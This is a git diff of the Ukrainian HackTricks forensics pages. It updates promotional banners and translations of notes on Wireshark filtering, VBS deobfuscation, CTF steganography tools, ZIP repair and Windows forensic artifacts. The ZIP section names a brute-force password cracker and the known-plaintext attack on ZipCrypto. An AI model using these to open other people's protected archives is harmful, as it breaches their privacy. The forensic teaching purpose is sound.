увагу, що фільтри ftp/http/ssh/telnet корисні, якщо ви розшифрували трафік. +Після виявлення **невідомих MAC-адрес**, які спілкуються в мережі, ви можете використовувати **фільтри**, подібні до наступного: `wlan.addr== && (ftp || http || ssh || telnet)` для фільтрації трафіку. Зверніть увагу, що фільтри ftp/http/ssh/telnet корисні, якщо ви розшифрували трафік. -# Розшифрувати трафік +# Розшифрування трафіку -Редагувати --> Налаштування --> Протоколи --> IEEE 802.11--> Редагувати +Редагування --> Налаштування --> Протоколи --> IEEE 802.11--> Редагувати ![](<../../../.gitbook/assets/image (426).png>) diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md index f438460e3..eee509296 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md @@ -1,16 +1,17 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS:[**Навчання AWS Red Team Expert (ARTE) від HackTricks**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання GCP Red Team Expert (GRTE) від HackTricks**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану в HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДТРИМКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} Тут ви знайдете цікаві трюки для конкретних типів файлів та/або програмного забезпечення: @@ -32,21 +33,3 @@ {% page-ref page="video-and-audio-file-analysis.md" %} {% page-ref page="zips-tricks.md" %} - - - - - -
- -Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! - -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану в HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДТРИМКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. - -
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md index 0e15b49b4..3f51e383c 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md @@ -1,19 +1,20 @@ +{% hint style="success" %} +Вивчайте та вправляйтеся в хакінгу AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та вправляйтеся в хакінгу GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} -Деякі речі, які можуть бути корисними для відлагодження/деобфускації зловмисного файлу VBS: +Деякі речі, які можуть бути корисними для відлагодження/деобфускації шкідливого файлу VBS: ## echo ```bash @@ -52,16 +53,17 @@ End With End Function ``` +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити свою **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md index 8f0a288dc..7ad3cfa16 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md @@ -1,33 +1,20 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub.
+{% endhint %} -**Файли PNG** високо цінуються в **викликах CTF** за їх **безвтратне стиснення**, що робить їх ідеальними для вбудовування прихованих даних. Інструменти, такі як **Wireshark**, дозволяють аналізувати файли PNG шляхом розкладання їх даних у мережевих пакетах, розкриваючи вбудовану інформацію або аномалії. +**Файли PNG** високо цінуються в **викликах CTF** за їхню **безвтратну стисненість**, що робить їх ідеальними для вбудовування прихованих даних. Інструменти, такі як **Wireshark**, дозволяють аналізувати файли PNG шляхом розкладання їх даних у мережевих пакетах, розкриваючи вбудовану інформацію або аномалії. -Для перевірки цілісності файлів PNG та виправлення пошкоджень використовується інструмент **pngcheck**, який надає функціонал командного рядка для перевірки та діагностики файлів PNG ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). Коли файли виходять за межі простих виправлень, онлайн-сервіси, такі як [PixRecovery від OfficeRecovery](https://online.officerecovery.com/pixrecovery/), надають веб-рішення для **відновлення пошкоджених PNG**, допомагаючи відновити важливі дані для учасників CTF. +Для перевірки цілісності файлів PNG та виправлення пошкоджень, **pngcheck** є важливим інструментом, який пропонує функціонал командного рядка для перевірки та діагностики файлів PNG ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). Коли файли виходять за межі простих виправлень, онлайн-сервіси, такі як [PixRecovery від OfficeRecovery](https://online.officerecovery.com/pixrecovery/), надають веб-орієнтоване рішення для **відновлення пошкоджених PNG**, допомагаючи відновити важливі дані для учасників CTF. Ці стратегії підкреслюють важливість комплексного підходу в CTF, використовуючи комбінацію аналітичних інструментів та технік відновлення для виявлення та відновлення прихованих або втрачених даних. - -
- -Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! - -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. - -
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md index b9ae07cdb..a42c89dfa 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md @@ -1,28 +1,28 @@ +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub.
+{% endhint %} -**Маніпулювання аудіо та відео файлами** є стандартом у завданнях з **форензики CTF**, використовуючи **стеганографію** та аналіз метаданих для приховання або розкриття секретних повідомлень. Інструменти, такі як **[mediainfo](https://mediaarea.net/en/MediaInfo)** та **`exiftool`**, є необхідними для перевірки метаданих файлу та ідентифікації типів вмісту. +**Маніпулювання аудіо та відео файлами** є основою викликів з **форензики CTF**, використовуючи **стеганографію** та аналіз метаданих для приховання або розкриття секретних повідомлень. Інструменти, такі як **[mediainfo](https://mediaarea.net/en/MediaInfo)** та **`exiftool`**, є необхідними для інспекції метаданих файлів та ідентифікації типів контенту. -Для завдань з аудіо **[Audacity](http://www.audacityteam.org/)** виділяється як провідний інструмент для перегляду хвиль та аналізу спектрограм, що є важливим для виявлення тексту, закодованого в аудіо. **[Sonic Visualiser](http://www.sonicvisualiser.org/)** високо рекомендується для детального аналізу спектрограм. **Audacity** дозволяє маніпулювати аудіо, такі як уповільнення або реверс треків для виявлення схованих повідомлень. **[Sox](http://sox.sourceforge.net/)**, утиліта командного рядка, відмінно підходить для конвертації та редагування аудіо файлів. +Для викликів з аудіо, **[Audacity](http://www.audacityteam.org/)** виділяється як першорядний інструмент для перегляду хвиль та аналізу спектрограм, які є важливими для виявлення тексту, закодованого в аудіо. **[Sonic Visualiser](http://www.sonicvisualiser.org/)** високо рекомендується для детального аналізу спектрограм. **Audacity** дозволяє маніпулювати аудіо, такі як уповільнення або реверс треків для виявлення схованих повідомлень. **[Sox](http://sox.sourceforge.net/)**, утиліта командного рядка, відмінно підходить для конвертації та редагування аудіо файлів. -Маніпулювання **найменш значущими бітами (LSB)** є поширеною технікою в аудіо та відео стеганографії, використовуючи фіксовані частини файлів медіа для приховування даних непомітно. **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** корисний для декодування повідомлень, прихованих у вигляді **DTMF сигналів** або **коду Морзе**. +Маніпулювання **найменш значущими бітами (LSB)** є поширеною технікою в стеганографії аудіо та відео, використовуючи фіксовані частини файлів медіа для приховування даних непомітно. **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** корисний для декодування повідомлень, прихованих у вигляді **DTMF сигналів** або **коду Морзе**. -Завдання з відео часто включають контейнерні формати, які об'єднують аудіо та відео потоки. **[FFmpeg](http://ffmpeg.org/)** є основним інструментом для аналізу та маніпулювання цими форматами, здатним демультиплексувати та відтворювати вміст. Для розробників, **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** інтегрує можливості FFmpeg у Python для продвинутих сценаріїв взаємодії. +Відео виклики часто включають формати контейнерів, які об'єднують аудіо та відео потоки. **[FFmpeg](http://ffmpeg.org/)** є основним інструментом для аналізу та маніпулювання цими форматами, здатним демультиплексувати та відтворювати вміст. Для розробників, **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** інтегрує можливості FFmpeg у Python для продвинутих сценаріїв взаємодії. -Цей набір інструментів підкреслює необхідну універсальність у завданнях CTF, де учасники повинні використовувати широкий спектр аналізу та маніпуляційних технік для виявлення схованих даних у аудіо та відео файлах. +Цей набір інструментів підкреслює необхідну універсальність вимог, які ставляться в CTF викликах, де учасники повинні використовувати широкий спектр аналізу та маніпуляційних технік для виявлення схованих даних у аудіо та відео файлах. -## References +## Посилання * [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/) - - +{% endhint %} diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md index f5670cb17..4db6d22ea 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md @@ -1,30 +1,46 @@ # Підступи до ZIP-файлів +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити **рекламу вашої компанії на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub.
+{% endhint %} **Командні інструменти** для управління **zip-файлами** є важливими для діагностики, відновлення та взлому zip-файлів. Ось деякі ключові утиліти: - **`unzip`**: Розкриває причину, чому zip-файл може не розпакуватися. - **`zipdetails -v`**: Надає детальний аналіз полів формату zip-файлу. -- **`zipinfo`**: Показує вміст zip-файлу без їх видобутку. +- **`zipinfo`**: Виводить список вмісту zip-файлу без їх видобутку. - **`zip -F input.zip --out output.zip`** та **`zip -FF input.zip --out output.zip`**: Спробуйте відновити пошкоджені zip-файли. -- **[fcrackzip](https://github.com/hyc/fcrackzip)**: Інструмент для грубої сили підбору паролів для zip, ефективний для паролів до близько 7 символів. +- **[fcrackzip](https://github.com/hyc/fcrackzip)**: Інструмент для брутфорсного взлому паролів zip, ефективний для паролів до близько 7 символів. -Специфікація [формату zip-файлу](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) надає вичерпні відомості про структуру та стандарти zip-файлів. +Специфікація формату zip-файлу надає вичерпні відомості про структуру та стандарти zip-файлів. -Важливо зауважити, що захищені паролем zip-файли **не шифрують імена файлів або розміри файлів** всередині, уразливість, яку не поділяють файли RAR або 7z, які шифрують цю інформацію. Крім того, zip-файли, зашифровані за допомогою старішого методу ZipCrypto, вразливі до **атаки на текст**, якщо доступний незашифрований примірник стиснутого файлу. Ця атака використовує відомий вміст для взлому пароля zip, уразливість, детально описана в [статті HackThis](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) та подальше пояснення в [цій науковій статті](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf). Однак zip-файли, захищені шифруванням **AES-256**, є невразливими до цієї атаки на текст, демонструючи важливість вибору безпечних методів шифрування для конфіденційних даних. +Важливо зауважити, що захищені паролем zip-файли **не шифрують імена файлів або розміри файлів** всередині, уразливість, яку не поділяють файли RAR або 7z, які шифрують цю інформацію. Крім того, zip-файли, зашифровані за допомогою старішого методу ZipCrypto, вразливі до **атаки на текст** у разі наявності незашифрованої копії стиснутого файлу. Ця атака використовує відомий вміст для взлому пароля zip, уразливість детально описана в [статті HackThis](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) та подальше пояснено в [цій науковій статті](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf). Однак zip-файли, захищені шифруванням **AES-256**, є невразливими до цієї атаки на текст, демонструючи важливість вибору безпечних методів шифрування для конфіденційних даних. ## Посилання * [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/) + +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Підтримайте HackTricks + +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub. + +
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/windows-forensics/README.md b/forensics/basic-forensic-methodology/windows-forensics/README.md index 7c5bb93fc..51f9ab8f9 100644 --- a/forensics/basic-forensic-methodology/windows-forensics/README.md +++ b/forensics/basic-forensic-methodology/windows-forensics/README.md @@ -2,19 +2,24 @@ ## Віконні артефакти +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS: [**Навчання AWS Red Team Expert (ARTE) HackTricks**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Навчання GCP Red Team Expert (GRTE) HackTricks**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub.
+{% endhint %} + +
+ +{% embed url="https://websec.nl/" %} ## Загальні віконні артефакти @@ -32,7 +37,7 @@ ### ADS (Alternate Data Streams) -Завантажені файли можуть містити **ADS Zone.Identifier**, що вказує, **як** він був **завантажений** з інтранету, Інтернету і т.д. Деяке програмне забезпечення (наприклад, браузери) зазвичай навіть додають **більше** **інформації**, наприклад, **URL** з якого був завантажений файл. +Завантажені файли можуть містити **ADS Zone.Identifier**, що вказує, **як** він був **завантажений** з інтранету, Інтернету і т. д. Деяке програмне забезпечення (наприклад, браузери) зазвичай навіть додають **більше** **інформації**, наприклад, **URL** з якого був завантажений файл. ## **Резервні копії файлів** @@ -54,17 +59,17 @@ ### Тіньові копії томів -Тіньова копія - це технологія, включена в Microsoft Windows, яка може створювати **резервні копії** або знімки файлів або томів комп'ютера, навіть коли вони використовуються. +Shadow Copy - це технологія, включена в Microsoft Windows, яка може створювати **резервні копії** або знімки файлів або томів комп'ютера, навіть коли вони використовуються. -Ці резервні копії зазвичай розташовані в `\System Volume Information` від кореня файлової системи, а назва складається з **UID**, показаних на наступному зображенні: +Ці резервні копії зазвичай знаходяться в `\System Volume Information` від кореня файлової системи, а їх назва складається з **UID**, показаних на наступному зображенні: ![](<../../../.gitbook/assets/image (520).png>) -Підключаючи образ для форензіки за допомогою **ArsenalImageMounter**, інструмент [**ShadowCopyView**](https://www.nirsoft.net/utils/shadow\_copy\_view.html) може бути використаний для огляду тіньової копії та навіть **екстрагування файлів** з резервних копій тіньової копії. +Підключаючи образ для форензики за допомогою **ArsenalImageMounter**, інструмент [**ShadowCopyView**](https://www.nirsoft.net/utils/shadow\_copy\_view.html) може бути використаний для огляду тіньової копії та навіть **екстрагування файлів** з резервних копій тіньових копій. ![](<../../../.gitbook/assets/image (521).png>) -Запис реєстру `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore` містить файли та ключі, які **необхідно резервувати**: +Запис реєстру `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore` містить файли та ключі, які **необхідно резервне копіювання**: ![](<../../../.gitbook/assets/image (522).png>) @@ -72,7 +77,7 @@ ### Файли автозбереження Office -Ви можете знайти файли автозбереження Office за адресою: `C:\Usuarios\\AppData\Roaming\Microsoft{Excel|Word|Powerpoint}\` +Ви можете знайти файли автозбереження Office за шляхом: `C:\Usuarios\\AppData\Roaming\Microsoft{Excel|Word|Powerpoint}\` ## Елементи оболонки @@ -80,16 +85,16 @@ ### Останні документи (LNK) -Windows **автоматично створює** ці **ярлики**, коли користувач **відкриває, використовує або створює файл** в: +Windows **автоматично** **створює** ці **ярлики**, коли користувач **відкриває, використовує або створює файл** в: * Win7-Win10: `C:\Users\\AppData\Roaming\Microsoft\Windows\Recent\` * Office: `C:\Users\\AppData\Roaming\Microsoft\Office\Recent\` При створенні папки також створюється посилання на папку, на батьківську папку та прабатьківську папку. -Ці автоматично створені файли посилань **містять інформацію про походження**, наприклад, чи це **файл** **чи** **папка**, **часи MAC** 